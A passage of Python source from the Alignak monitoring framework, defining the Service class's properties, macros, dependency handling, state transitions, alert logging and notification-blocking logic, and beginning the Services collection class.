'check_type':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'has_been_checked':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'should_be_scheduled':
IntegerProp(default=1, fill_brok=['full_status'], retention=True),
'last_problem_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'current_problem_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'execution_time':
FloatProp(default=0.0, fill_brok=['full_status', 'check_result'], retention=True),
'u_time':
FloatProp(default=0.0),
's_time':
FloatProp(default=0.0),
'last_notification':
FloatProp(default=0.0, fill_brok=['full_status'], retention=True),
'current_notification_number':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'current_notification_id':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'check_flapping_recovery_notification':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'scheduled_downtime_depth':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'pending_flex_downtime':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'timeout':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'start_time':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'end_time':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'early_timeout':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'return_code':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'perf_data':
StringProp(default='', fill_brok=['full_status', 'check_result'], retention=True),
'last_perf_data':
StringProp(default='', retention=True),
'host':
StringProp(default=None),
'customs':
DictProp(default={}, fill_brok=['full_status']),
# Warning: for the notified_contacts retention save,
# we save only the names of the contacts, and we should RELINK
# them when we load it.
# use for having all contacts we have notified
'notified_contacts': ListProp(default=set(),
retention=True,
retention_preparation=to_list_of_names),
'in_scheduled_downtime': BoolProp(
default=False, fill_brok=['full_status', 'check_result'], retention=True),
'in_scheduled_downtime_during_last_check': BoolProp(default=False, retention=True),
'actions': ListProp(default=[]), # put here checks and notif raised
'broks': ListProp(default=[]), # and here broks raised
# Problem/impact part
'is_problem': BoolProp(default=False, fill_brok=['full_status']),
'is_impact': BoolProp(default=False, fill_brok=['full_status']),
# the saved value of our business_impact for "problems"
'my_own_business_impact': IntegerProp(default=-1, fill_brok=['full_status']),
# list of problems that make us an impact
'source_problems': ListProp(default=[],
fill_brok=['full_status'],
brok_transformation=to_svc_hst_distinct_lists),
# list of the impact I'm the cause of
'impacts': ListProp(default=[],
fill_brok=['full_status'],
brok_transformation=to_svc_hst_distinct_lists),
# keep a trace of the old state before being an impact
'state_before_impact': StringProp(default='PENDING'),
# keep a trace of the old state id before being an impact
'state_id_before_impact': IntegerProp(default=0),
# if the state change, we know so we do not revert it
'state_changed_since_impact': BoolProp(default=False),
# BUSINESS CORRELATOR PART
# Say if we are business based rule or not
'got_business_rule': BoolProp(default=False, fill_brok=['full_status']),
# Previously processed business rule (with macro expanded)
'processed_business_rule': StringProp(default="", fill_brok=['full_status']),
# Our Dependency node for the business rule
'business_rule': StringProp(default=None),
# Here it's the elements we are depending on
# so our parents as network relation, or a host
# we are depending in a hostdependency
# or even if we are business based.
'parent_dependencies': StringProp(default=set(),
brok_transformation=to_svc_hst_distinct_lists,
fill_brok=['full_status']),
# Here it's the guys that depend on us. So it's the total
# opposite of the parent_dependencies
'child_dependencies': StringProp(brok_transformation=to_svc_hst_distinct_lists,
default=set(), fill_brok=['full_status']),
# Manage the unknown/unreach during hard state
'in_hard_unknown_reach_phase': BoolProp(default=False, retention=True),
'was_in_hard_unknown_reach_phase': BoolProp(default=False, retention=True),
'state_before_hard_unknown_reach_phase': StringProp(default='OK', retention=True),
# Set if the element just change its father/son topology
'topology_change': BoolProp(default=False, fill_brok=['full_status']),
# Trigger list
'triggers': ListProp(default=[]),
# snapshots part
'last_snapshot': IntegerProp(default=0, fill_brok=['full_status'], retention=True),
# Keep the string of the last command launched for this element
'last_check_command': StringProp(default=''),
})
# Mapping between Macros and properties (can be prop or a function)
macros = {
'SERVICEDESC': 'service_description',
'SERVICEDISPLAYNAME': 'display_name',
'SERVICESTATE': 'state',
'SERVICESTATEID': 'state_id',
'LASTSERVICESTATE': 'last_state',
'LASTSERVICESTATEID': 'last_state_id',
'SERVICESTATETYPE': 'state_type',
'SERVICEATTEMPT': 'attempt',
'MAXSERVICEATTEMPTS': 'max_check_attempts',
'SERVICEISVOLATILE': 'is_volatile',
'SERVICEEVENTID': 'current_event_id',
'LASTSERVICEEVENTID': 'last_event_id',
'SERVICEPROBLEMID': 'current_problem_id',
'LASTSERVICEPROBLEMID': 'last_problem_id',
'SERVICELATENCY': 'latency',
'SERVICEEXECUTIONTIME': 'execution_time',
'SERVICEDURATION': 'get_duration',
'SERVICEDURATIONSEC': 'get_duration_sec',
'SERVICEDOWNTIME': 'get_downtime',
'SERVICEPERCENTCHANGE': 'percent_state_change',
'SERVICEGROUPNAME': 'get_groupname',
'SERVICEGROUPNAMES': 'get_groupnames',
'LASTSERVICECHECK': 'last_chk',
'LASTSERVICESTATECHANGE': 'last_state_change',
'LASTSERVICEOK': 'last_time_ok',
'LASTSERVICEWARNING': 'last_time_warning',
'LASTSERVICEUNKNOWN': 'last_time_unknown',
'LASTSERVICECRITICAL': 'last_time_critical',
'SERVICEOUTPUT': 'output',
'LONGSERVICEOUTPUT': 'long_output',
'SERVICEPERFDATA': 'perf_data',
'LASTSERVICEPERFDATA': 'last_perf_data',
'SERVICECHECKCOMMAND': 'get_check_command',
'SERVICEACKAUTHOR': 'get_ack_author_name',
'SERVICEACKAUTHORNAME': 'get_ack_author_name',
'SERVICEACKAUTHORALIAS': 'get_ack_author_name',
'SERVICEACKCOMMENT': 'get_ack_comment',
'SERVICEACTIONURL': 'action_url',
'SERVICENOTESURL': 'notes_url',
'SERVICENOTES': 'notes',
'SERVICEBUSINESSIMPACT': 'business_impact',
# Business rules output formatting related macros
'STATUS': 'get_status',
'SHORTSTATUS': 'get_short_status',
'FULLNAME': 'get_full_name',
}
# This table is used to transform old parameter names into new ones
# so from Nagios2 format, to Nagios3 ones.
# Or Alignak deprecated names like criticity
old_properties = {
'normal_check_interval': 'check_interval',
'retry_check_interval': 'retry_interval',
'criticity': 'business_impact',
'hostgroup': 'hostgroup_name',
'hostgroups': 'hostgroup_name',
# 'criticitymodulations': 'business_impact_modulations',
}
#######
# __ _ _ _
# / _(_) | | (_)
# ___ ___ _ __ | |_ _ __ _ _ _ _ __ __ _| |_ _ ___ _ __
# / __/ _ \| '_ \| _| |/ _` | | | | '__/ _` | __| |/ _ \| '_ \
# | (_| (_) | | | | | | | (_| | |_| | | | (_| | |_| | (_) | | | |
# \___\___/|_| |_|_| |_|\__, |\__,_|_| \__,_|\__|_|\___/|_| |_|
# __/ |
# |___/
######
def __repr__(self):
return '<Service host_name=%r desc=%r name=%r use=%r />' % (
getattr(self, 'host_name', None),
getattr(self, 'service_description', None),
getattr(self, 'name', None),
getattr(self, 'use', None)
)
__str__ = __repr__
@property
def unique_key(self): # actually only used for (un)indexitem() via name_property..
return (self.host_name, self.service_description)
@property
def display_name(self):
display_name = getattr(self, '_display_name', None)
if not display_name:
return self.service_description
return display_name
@display_name.setter
def display_name(self, display_name):
self._display_name = display_name
# Give a nice name output
def get_name(self):
if hasattr(self, 'service_description'):
return self.service_description
if hasattr(self, 'name'):
return self.name
return 'SERVICE-DESCRIPTION-MISSING'
# Get the servicegroups names
def get_groupnames(self):
return ','.join([sg.get_name() for sg in self.servicegroups])
# Need the whole name for debugging purpose
def get_dbg_name(self):
return "%s/%s" % (self.host.host_name, self.service_description)
def get_full_name(self):
if self.host and hasattr(self.host, 'host_name') and hasattr(self, 'service_description'):
return "%s/%s" % (self.host.host_name, self.service_description)
return 'UNKNOWN-SERVICE'
# Get our realm, so in fact our host one
def get_realm(self):
if self.host is None:
return None
return self.host.get_realm()
def get_hostgroups(self):
return self.host.hostgroups
def get_host_tags(self):
return self.host.tags
def get_service_tags(self):
return self.tags
# Check if required props are set:
# templates are always correct
# contacts OR contactgroups is needed
def is_correct(self):
state = True
cls = self.__class__
source = getattr(self, 'imported_from', 'unknown')
desc = getattr(self, 'service_description', 'unnamed')
hname = getattr(self, 'host_name', 'unnamed')
special_properties = ('check_period', 'notification_interval', 'host_name',
'hostgroup_name', 'notification_period')
for prop, entry in cls.properties.items():
if prop not in special_properties:
if not hasattr(self, prop) and entry.required:
logger.error("The service %s on host '%s' does not have %s", desc, hname, prop)
state = False # Bad boy...
# Then look if we have some errors in the conf
# Just print warnings, but raise errors
for err in self.configuration_warnings:
logger.warning("[service::%s] %s", desc, err)
# Raise all previously seen errors, like unknown contacts and co
if self.configuration_errors != []:
state = False
for err in self.configuration_errors:
logger.error("[service::%s] %s", self.get_full_name(), err)
# If no notif period, set it to None, meaning 24x7
if not hasattr(self, 'notification_period'):
self.notification_period = None
# Ok now we manage special cases...
if self.notifications_enabled and self.contacts == []:
logger.warning("The service '%s' in the host '%s' does not have "
"contacts nor contact_groups in '%s'", desc, hname, source)
# Set display_name if needed
if getattr(self, 'display_name', '') == '':
self.display_name = getattr(self, 'service_description', '')
# If we got an event handler, it should be valid
if getattr(self, 'event_handler', None) and not self.event_handler.is_valid():
logger.error("%s: my event_handler %s is invalid",
self.get_name(), self.event_handler.command)
state = False
if not hasattr(self, 'check_command'):
logger.error("%s: I've got no check_command", self.get_name())
state = False
# Ok got a command, but maybe it's invalid
else:
if not self.check_command.is_valid():
logger.error("%s: my check_command %s is invalid",
self.get_name(), self.check_command.command)
state = False
if self.got_business_rule:
if not self.business_rule.is_valid():
logger.error("%s: my business rule is invalid", self.get_name(),)
for bperror in self.business_rule.configuration_errors:
logger.error("%s: %s", self.get_name(), bperror)
state = False
if not hasattr(self, 'notification_interval') \
and self.notifications_enabled is True:
logger.error("%s: I've got no notification_interval but "
"I've got notifications enabled", self.get_name())
state = False
if not self.host_name:
logger.error("The service '%s' is not bound do any host.", desc)
state = False
elif self.host is None:
logger.error("The service '%s' got an unknown host_name '%s'.", desc, self.host_name)
state = False
if not hasattr(self, 'check_period'):
self.check_period = None
if hasattr(self, 'service_description'):
for c in cls.illegal_object_name_chars:
if c in self.service_description:
logger.error("%s: My service_description got the "
"character %s that is not allowed.", self.get_name(), c)
state = False
return state
# The service is dependent on its father dep
# Must be AFTER linkify
# TODO: implement "not host dependent" feature.
def fill_daddy_dependency(self):
# Depend of host, all status, is a networkdep
# and do not have timeperiod, and follow parents dep
if self.host is not None and self.host_dependency_enabled:
# I add the dep in MY list
self.act_depend_of.append(
(self.host, ['d', 'u', 's', 'f'], 'network_dep', None, True)
)
# I add the dep in Daddy list
self.host.act_depend_of_me.append(
(self, ['d', 'u', 's', 'f'], 'network_dep', None, True)
)
# And the parent/child dep lists too
self.host.register_son_in_parent_child_dependencies(self)
# Register the dependency between 2 service for action (notification etc)
def add_service_act_dependency(self, srv, status, timeperiod, inherits_parent):
# first I add the other one I depend on in MY list
self.act_depend_of.append((srv, status, 'logic_dep', timeperiod, inherits_parent))
# then I register myself in the other service dep list
srv.act_depend_of_me.append((self, status, 'logic_dep', timeperiod, inherits_parent))
# And the parent/child dep lists too
srv.register_son_in_parent_child_dependencies(self)
# Register the dependency between 2 service for action (notification etc)
# but based on a BUSINESS rule, so in fact:
# ERP depends on database, so we fill just database.act_depend_of_me
# because we will want ERP mails to go on! So call this
# on the database service with the srv=ERP service
def add_business_rule_act_dependency(self, srv, status, timeperiod, inherits_parent):
# I only register so it knows that I WILL be an impact
self.act_depend_of_me.append((srv, status, 'business_dep',
timeperiod, inherits_parent))
# And the parent/child dep lists too
self.register_son_in_parent_child_dependencies(srv)
# Register the dependency between 2 service for checks
def add_service_chk_dependency(self, srv, status, timeperiod, inherits_parent):
# first I add the other one I depend on in MY list
self.chk_depend_of.append((srv, status, 'logic_dep', timeperiod, inherits_parent))
# then I register myself in the other service dep list
srv.chk_depend_of_me.append(
(self, status, 'logic_dep', timeperiod, inherits_parent)
)
# And the parent/child dep lists too
srv.register_son_in_parent_child_dependencies(self)
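# For reference, the dependency entries appended above are 5-tuples of the form
# (item, statuses, dep_type, timeperiod, inherits_parent); an illustrative check
# dependency triggering on WARNING/CRITICAL would look like
# (srv, ['w', 'c'], 'logic_dep', None, True).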
def duplicate(self, host):
''' For a given host, look for all copies we must create for the duplicate_foreach property
:type host: alignak.objects.host.Host
:return Service
'''
# In macro, it's all in UPPER case
prop = self.duplicate_foreach.strip().upper()
if prop not in host.customs: # If I do not have the property, we bail out
return []
duplicates = []
# Get the list entry, and the not one if there is one
entry = host.customs[prop]
# Look at the list of the key we do NOT want maybe,
# for _disks it will be _!disks
not_entry = host.customs.get('_' + '!' + prop[1:], '').split(',')
not_keys = strip_and_uniq(not_entry)
default_value = getattr(self, 'default_value', '')
# Transform the generator string to a list
# Missing values are filled with the default value
(key_values, errcode) = get_key_value_sequence(entry, default_value)
if key_values:
for key_value in key_values:
key = key_value['KEY']
# Maybe this key is in the NOT list, if so, skip it
if key in not_keys:
continue
value = key_value['VALUE']
new_s = self.copy()
new_s.host_name = host.get_name()
if self.is_tpl(): # if template, the new one is not
new_s.register = 1
for key in key_value:
if key == 'KEY':
if hasattr(self, 'service_description'):
# We want to change all illegal chars to a _ sign.
# We can't use class.illegal_obj_char
# because in the "explode" phase, we do not have access to this data! :(
safe_key_value = re.sub(r'[' + "`~!$%^&*\"|'<>?,()=" + ']+', '_',
key_value[key])
new_s.service_description = self.service_description.replace(
'$' + key + '$', safe_key_value
)
# Here is a list of property where we will expand the $KEY$ by the value
_the_expandables = ['check_command', 'aggregation', 'event_handler']
for prop in _the_expandables:
if hasattr(self, prop):
# here we can replace VALUE, VALUE1, VALUE2,...
setattr(new_s, prop, getattr(new_s, prop).replace('$' + key + '$',
key_value[key]))
if hasattr(self, 'service_dependencies'):
for i, sd in enumerate(new_s.service_dependencies):
new_s.service_dependencies[i] = sd.replace(
'$' + key + '$', key_value[key]
)
# And then add in our list this new service
duplicates.append(new_s)
else:
# If error, we should link the error to the host, because self is
# a template, and so won't be checked nor printed!
if errcode == GET_KEY_VALUE_SEQUENCE_ERROR_SYNTAX:
err = "The custom property '%s' of the host '%s' is not a valid entry %s for a service generator" % \
(self.duplicate_foreach.strip(), host.get_name(), entry)
logger.warning(err)
host.configuration_errors.append(err)
elif errcode == GET_KEY_VALUE_SEQUENCE_ERROR_NODEFAULT:
err = "The custom property '%s 'of the host '%s' has empty " \
"values %s but the service %s has no default_value" % \
(self.duplicate_foreach.strip(),
host.get_name(), entry, self.service_description)
logger.warning(err)
host.configuration_errors.append(err)
elif errcode == GET_KEY_VALUE_SEQUENCE_ERROR_NODE:
err = "The custom property '%s' of the host '%s' has an invalid node range %s" % \
(self.duplicate_foreach.strip(), host.get_name(), entry)
logger.warning(err)
host.configuration_errors.append(err)
return duplicates
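# Illustrative sketch of the duplication above (all names and values are
# hypothetical): a host defining the custom macro
#     _disks  C$(80%!90%)$,D
# combined with a service template using
#     duplicate_foreach      _disks
#     service_description    Disk $KEY$
#     check_command          check_disk!$VALUE$
# would yield two concrete services, "Disk C" with check_disk!80%!90% and
# "Disk D" with the template's default_value substituted for $VALUE$.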
#####
# _
# (_)
# _ __ _ _ _ __ _ __ _ _ __ __ _
# | '__| | | | '_ \| '_ \| | '_ \ / _` |
# | | | |_| | | | | | | | | | | | (_| |
# |_| \__,_|_| |_|_| |_|_|_| |_|\__, |
# __/ |
# |___/
####
# Set unreachable: our host is DOWN, but it means nothing for a service
def set_unreachable(self):
pass
# We just got an impact, so we go unreachable
# but only if it's enabled in the configuration
def set_impact_state(self):
cls = self.__class__
if cls.enable_problem_impacts_states_change:
# Keep a trace of the old state (problem came back before
# a new check)
self.state_before_impact = self.state
self.state_id_before_impact = self.state_id
# this flag will know if we override the impact state
self.state_changed_since_impact = False
self.state = 'UNKNOWN' # exit code UNDETERMINED
self.state_id = 3
# Ok, we are no longer an impact; if no new checks
# override the impact state, we come back to the old
# states
# And only if we enable the state change for impacts
def unset_impact_state(self):
cls = self.__class__
if cls.enable_problem_impacts_states_change and not self.state_changed_since_impact:
self.state = self.state_before_impact
self.state_id = self.state_id_before_impact
# Set state with the status returned by the check
# and update flapping state
def set_state_from_exit_status(self, status):
now = time.time()
self.last_state_update = now
# we should put in last_state the good last state:
# if the state was not just changed by a problem/impact
# we can take the current state. But if it's the case, the
# real old state is self.state_before_impact (it's the TRUE
# state in fact)
# but only if the global conf has enabled the impact state change
cls = self.__class__
if cls.enable_problem_impacts_states_change \
and self.is_impact \
and not self.state_changed_since_impact:
self.last_state = self.state_before_impact
else: # standard case
self.last_state = self.state
if status == 0:
self.state = 'OK'
self.state_id = 0
self.last_time_ok = int(self.last_state_update)
state_code = 'o'
elif status == 1:
self.state = 'WARNING'
self.state_id = 1
self.last_time_warning = int(self.last_state_update)
state_code = 'w'
elif status == 2:
self.state = 'CRITICAL'
self.state_id = 2
self.last_time_critical = int(self.last_state_update)
state_code = 'c'
elif status == 3:
self.state = 'UNKNOWN'
self.state_id = 3
self.last_time_unknown = int(self.last_state_update)
state_code = 'u'
else:
self.state = 'CRITICAL' # exit code UNDETERMINED
self.state_id = 2
self.last_time_critical = int(self.last_state_update)
state_code = 'c'
if state_code in self.flap_detection_options:
self.add_flapping_change(self.state != self.last_state)
if self.state != self.last_state:
self.last_state_change = self.last_state_update
self.duration_sec = now - self.last_state_change
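# Exit-code to state mapping implemented above, for reference:
#     0 -> OK, 1 -> WARNING, 2 -> CRITICAL, 3 -> UNKNOWN,
#     any other code -> CRITICAL (undetermined exit code).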
# Return True if status is the state (like OK) or small form like 'o'
def is_state(self, status):
if status == self.state:
return True
# Now low status
elif status == 'o' and self.state == 'OK':
return True
elif status == 'c' and self.state == 'CRITICAL':
return True
elif status == 'w' and self.state == 'WARNING':
return True
elif status == 'u' and self.state == 'UNKNOWN':
return True
return False
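# Example (illustrative): for a service currently in state 'CRITICAL',
# is_state('CRITICAL') and is_state('c') both return True, while is_state('o')
# returns False.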
# The last time when the state was not OK
def last_time_non_ok_or_up(self):
non_ok_times = filter(lambda x: x > self.last_time_ok, [self.last_time_warning,
self.last_time_critical,
self.last_time_unknown])
if len(non_ok_times) == 0:
last_time_non_ok = 0 # program_start would be better
else:
last_time_non_ok = min(non_ok_times)
return last_time_non_ok
# Add a log entry with a SERVICE ALERT like:
# SERVICE ALERT: server;Load;UNKNOWN;HARD;1;I don't know what to say...
def raise_alert_log_entry(self):
naglog_result('critical', 'SERVICE ALERT: %s;%s;%s;%s;%d;%s'
% (self.host.get_name(), self.get_name(),
self.state, self.state_type,
self.attempt, self.output))
# If the configuration allows it, raise an initial log like
# CURRENT SERVICE STATE: server;Load;UNKNOWN;HARD;1;I don't know what to say...
def raise_initial_state(self):
if self.__class__.log_initial_states:
naglog_result('info', 'CURRENT SERVICE STATE: %s;%s;%s;%s;%d;%s'
% (self.host.get_name(), self.get_name(),
self.state, self.state_type, self.attempt, self.output))
    # Add a log entry with a Freshness alert like:
    # Warning: The results of service 'Load' on host 'Server' are stale by 0d 0h 0m 58s (threshold=0d 1h 0m 0s).
    # I'm forcing an immediate check of the service.
def raise_freshness_log_entry(self, t_stale_by, t_threshold):
logger.warning("The results of service '%s' on host '%s' are stale "
"by %s (threshold=%s). I'm forcing an immediate check "
"of the service.",
self.get_name(), self.host.get_name(),
format_t_into_dhms_format(t_stale_by),
format_t_into_dhms_format(t_threshold))
# Raise a log entry with a Notification alert like
# SERVICE NOTIFICATION: superadmin;server;Load;OK;notify-by-rss;no output
def raise_notification_log_entry(self, n):
contact = n.contact
command = n.command_call
if n.type in ('DOWNTIMESTART', 'DOWNTIMEEND', 'DOWNTIMECANCELLED',
'CUSTOM', 'ACKNOWLEDGEMENT', 'FLAPPINGSTART',
'FLAPPINGSTOP', 'FLAPPINGDISABLED'):
state = '%s (%s)' % (n.type, self.state)
else:
state = self.state
if self.__class__.log_notifications:
naglog_result('critical', "SERVICE NOTIFICATION: %s;%s;%s;%s;%s;%s"
% (contact.get_name(),
self.host.get_name(), self.get_name(), state,
command.get_name(), self.output))
    # Raise a log entry with an Eventhandler alert like
    # SERVICE EVENT HANDLER: test_host_0;test_ok_0;OK;SOFT;4;eventhandler
def raise_event_handler_log_entry(self, command):
if self.__class__.log_event_handlers:
naglog_result('critical', "SERVICE EVENT HANDLER: %s;%s;%s;%s;%s;%s"
% (self.host.get_name(), self.get_name(),
self.state, self.state_type,
self.attempt, command.get_name()))
    # Raise a log entry with a Snapshot alert like
    # SERVICE SNAPSHOT: test_host_0;test_ok_0;OK;SOFT;4;eventhandler
def raise_snapshot_log_entry(self, command):
if self.__class__.log_event_handlers:
naglog_result('critical', "SERVICE SNAPSHOT: %s;%s;%s;%s;%s;%s"
% (self.host.get_name(), self.get_name(),
self.state, self.state_type, self.attempt, command.get_name()))
# Raise a log entry with FLAPPING START alert like
# SERVICE FLAPPING ALERT: server;LOAD;STARTED;
# Service appears to have started flapping (50.6% change >= 50.0% threshold)
def raise_flapping_start_log_entry(self, change_ratio, threshold):
naglog_result('critical', "SERVICE FLAPPING ALERT: %s;%s;STARTED; "
"Service appears to have started flapping "
"(%.1f%% change >= %.1f%% threshold)"
% (self.host.get_name(), self.get_name(),
change_ratio, threshold))
# Raise a log entry with FLAPPING STOP alert like
# SERVICE FLAPPING ALERT: server;LOAD;STOPPED;
# Service appears to have stopped flapping (23.0% change < 25.0% threshold)
def raise_flapping_stop_log_entry(self, change_ratio, threshold):
naglog_result('critical', "SERVICE FLAPPING ALERT: %s;%s;STOPPED; "
"Service appears to have stopped flapping "
"(%.1f%% change < %.1f%% threshold)"
% (self.host.get_name(), self.get_name(),
change_ratio, threshold))
# If there is no valid time for next check, raise a log entry
def raise_no_next_check_log_entry(self):
        logger.warning("I cannot schedule the check for the service '%s' on "
                       "host '%s' because there is no future valid time",
                       self.get_name(), self.host.get_name())
# Raise a log entry when a downtime begins
# SERVICE DOWNTIME ALERT: test_host_0;test_ok_0;STARTED;
# Service has entered a period of scheduled downtime
def raise_enter_downtime_log_entry(self):
naglog_result('critical', "SERVICE DOWNTIME ALERT: %s;%s;STARTED; "
"Service has entered a period of scheduled "
"downtime" % (self.host.get_name(), self.get_name()))
# Raise a log entry when a downtime has finished
# SERVICE DOWNTIME ALERT: test_host_0;test_ok_0;STOPPED;
# Service has exited from a period of scheduled downtime
def raise_exit_downtime_log_entry(self):
naglog_result('critical', "SERVICE DOWNTIME ALERT: %s;%s;STOPPED; Service "
"has exited from a period of scheduled downtime"
% (self.host.get_name(), self.get_name()))
# Raise a log entry when a downtime prematurely ends
# SERVICE DOWNTIME ALERT: test_host_0;test_ok_0;CANCELLED;
    # Scheduled downtime for service has been cancelled.
def raise_cancel_downtime_log_entry(self):
naglog_result(
'critical', "SERVICE DOWNTIME ALERT: %s;%s;CANCELLED; "
"Scheduled downtime for service has been cancelled."
% (self.host.get_name(), self.get_name()))
    # Is stalking?
    # Launch only if the check is in 'waitconsume' (first consumption)
    # and its exit status maps to one of self.stalking_options
def manage_stalking(self, c):
need_stalk = False
if c.status == 'waitconsume':
if c.exit_status == 0 and 'o' in self.stalking_options:
need_stalk = True
elif c.exit_status == 1 and 'w' in self.stalking_options:
need_stalk = True
elif c.exit_status == 2 and 'c' in self.stalking_options:
need_stalk = True
elif c.exit_status == 3 and 'u' in self.stalking_options:
need_stalk = True
if c.output == self.output:
need_stalk = False
if need_stalk:
logger.info("Stalking %s: %s", self.get_name(), c.output)
    # Give data for checks' macros
def get_data_for_checks(self):
return [self.host, self]
    # Give data for event handlers' macros
def get_data_for_event_handler(self):
return [self.host, self]
    # Give data for notifications' macros
def get_data_for_notifications(self, contact, n):
return [self.host, self, contact, n]
# See if the notification is launchable (time is OK and contact is OK too)
def notification_is_blocked_by_contact(self, n, contact):
return not contact.want_service_notification(self.last_chk, self.state,
n.type, self.business_impact, n.command_call)
def get_duration_sec(self):
return str(int(self.duration_sec))
def get_duration(self):
m, s = divmod(self.duration_sec, 60)
h, m = divmod(m, 60)
return "%02dh %02dm %02ds" % (h, m, s)
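    # Illustrative example for get_duration above: with duration_sec == 3725
    # it returns "01h 02m 05s".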
def get_ack_author_name(self):
if self.acknowledgement is None:
return ''
return self.acknowledgement.author
def get_ack_comment(self):
if self.acknowledgement is None:
return ''
return self.acknowledgement.comment
def get_check_command(self):
return self.check_command.get_name()
# Check if a notification for this service is suppressed at this time
def notification_is_blocked_by_item(self, type, t_wished=None):
if t_wished is None:
t_wished = time.time()
# TODO
# forced notification
# pass if this is a custom notification
# Block if notifications are program-wide disabled
if not self.enable_notifications:
return True
# Does the notification period allow sending out this notification?
if self.notification_period is not None \
and not self.notification_period.is_time_valid(t_wished):
return True
# Block if notifications are disabled for this service
if not self.notifications_enabled:
return True
        # Block if the current state or notification type is not covered by the
        # notification_options (w,u,c,r,f,s), or if they are set to 'n' (none)
if 'n' in self.notification_options:
return True
if type in ('PROBLEM', 'RECOVERY'):
if self.state == 'UNKNOWN' and 'u' not in self.notification_options:
return True
if self.state == 'WARNING' and 'w' not in self.notification_options:
return True
if self.state == 'CRITICAL' and 'c' not in self.notification_options:
return True
if self.state == 'OK' and 'r' not in self.notification_options:
return True
if (type in ('FLAPPINGSTART', 'FLAPPINGSTOP', 'FLAPPINGDISABLED')
and 'f' not in self.notification_options):
return True
if (type in ('DOWNTIMESTART', 'DOWNTIMEEND', 'DOWNTIMECANCELLED')
and 's' not in self.notification_options):
return True
# Acknowledgements make no sense when the status is ok/up
if type == 'ACKNOWLEDGEMENT':
if self.state == self.ok_up:
return True
# When in downtime, only allow end-of-downtime notifications
if self.scheduled_downtime_depth > 1 and type not in ('DOWNTIMEEND', 'DOWNTIMECANCELLED'):
return True
# Block if host is in a scheduled downtime
if self.host.scheduled_downtime_depth > 0:
return True
# Block if in a scheduled downtime and a problem arises, or flapping event
if self.scheduled_downtime_depth > 0 and type in \
('PROBLEM', 'RECOVERY', 'FLAPPINGSTART', 'FLAPPINGSTOP', 'FLAPPINGDISABLED'):
return True
# Block if the status is SOFT
if self.state_type == 'SOFT' and type == 'PROBLEM':
return True
# Block if the problem has already been acknowledged
if self.problem_has_been_acknowledged and type != 'ACKNOWLEDGEMENT':
return True
# Block if flapping
if self.is_flapping and type not in ('FLAPPINGSTART', 'FLAPPINGSTOP', 'FLAPPINGDISABLED'):
return True
# Block if host is down
if self.host.state != self.host.ok_up:
return True
        # Block if business rule smart notifications are enabled and all its
        # children have been acknowledged or are under downtime.
if self.got_business_rule is True \
and self.business_rule_smart_notifications is True \
and self.business_rule_notification_is_blocked() is True \
and type == 'PROBLEM':
return True
return False
    # Get an oc*p command if the item has an obsess_over_*
    # command. It must be enabled locally and globally
def get_obsessive_compulsive_processor_command(self):
cls = self.__class__
if not cls.obsess_over or not self.obsess_over_service:
return
m = MacroResolver()
data = self.get_data_for_event_handler()
cmd = m.resolve_command(cls.ocsp_command, data)
e = EventHandler(cmd, timeout=cls.ocsp_timeout)
# ok we can put it in our temp action queue
self.actions.append(e)
def get_short_status(self):
mapping = {
0: "O",
1: "W",
2: "C",
3: "U",
}
if self.got_business_rule:
return mapping.get(self.business_rule.get_state(), "n/a")
else:
return mapping.get(self.state_id, "n/a")
def get_status(self):
if self.got_business_rule:
mapping = {
0: "OK",
1: "WARNING",
2: "CRITICAL",
3: "UNKNOWN",
}
return mapping.get(self.business_rule.get_state(), "n/a")
else:
return self.state
def get_downtime(self):
return str(self.scheduled_downtime_depth)
# Class for lists of services. It's mainly used for the configuration part
class Services(Items):
name_property = 'unique_key' # only used by (un)indexitem (via 'name_property')
    inner_class = Service  # used to know what is in items
def __init__(self, items, index_items=True):
self.partial_services = {}
self.name_to_partial = {}
super(Services, self).__init__(items, index_items)
def add_template(self, tpl):
"""
        Adds and indexes a template into the `templates` container.
        This implementation takes into account that a service has two naming
        attributes: `host_name` and `service_description`.
:param tpl: The template to add
"""
objcls = self.inner_class.my_type
name = getattr(tpl, 'name', '')
hname = getattr(tpl, 'host_name', '')
if not name and not hname:
mesg = "a %s template has been defined without name nor " \
"host_name%s" % (objcls, self.get_source(tpl))
tpl.configuration_errors.append(mesg)
elif name:
tpl = self.index_template(tpl)
self.templates[tpl.id] = tpl
def add_item(self, item, index=True, was_partial=False):
"""
        Adds and indexes an item into the `items` container.
        This implementation takes into account that a service has two naming
        attributes: `host_name` and `service_description`.
:param item: The item to add
:param index: Flag indicating if the item should be indexed
"""
objcls = self.inner_class.my_type
hname = getattr(item, 'host_name', '')
hgname = getattr(item, 'hostgroup_name', '')
sdesc = getattr(item, 'service_description', '')
source = getattr(item, 'imported_from', 'unknown')
if source:
in_file = " in %s" % source
else:
in_file = ""
if not hname and not hgname and not sdesc:
mesg = "a %s has been defined without host_name nor " \
"hostgroups nor service_description%s" % (objcls, in_file)
item.configuration_errors.append(mesg)
elif not sdesc or sdesc and not hgname and not hname and not was_partial:
self.add_partial_service(item, index, (objcls, hname, hgname, sdesc, in_file))
return
if index is True:
item = self.index_item(item)
self.items[item.id] = item
def add_partial_service(self, item, index=True, var_tuple=None):
if var_tuple is None:
return
objcls, hname, hgname, sdesc, in_file = var_tuple
use = getattr(item, 'use', [])
if use == []:
mesg = "a %s has been defined without host_name nor " \
"hostgroups nor service_description and " \
"there is no use to create a unique key%s" % (objcls, in_file)
item.configuration_errors.append(mesg)
return
use = ','.join(use)
if sdesc:
name = "::".join((sdesc, use))
elif hname:
name = "::".join((hname, use))
else:
name = "::".join((hgname, use))
if name in self.name_to_partial:
item = self.manage_conflict(item, name, partial=True)
self.name_to_partial[name] = item
self.partial_services[item.id] = item
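    # Illustrative example for add_partial_service above (hypothetical names):
    # a service defined with only service_description "Load" and use
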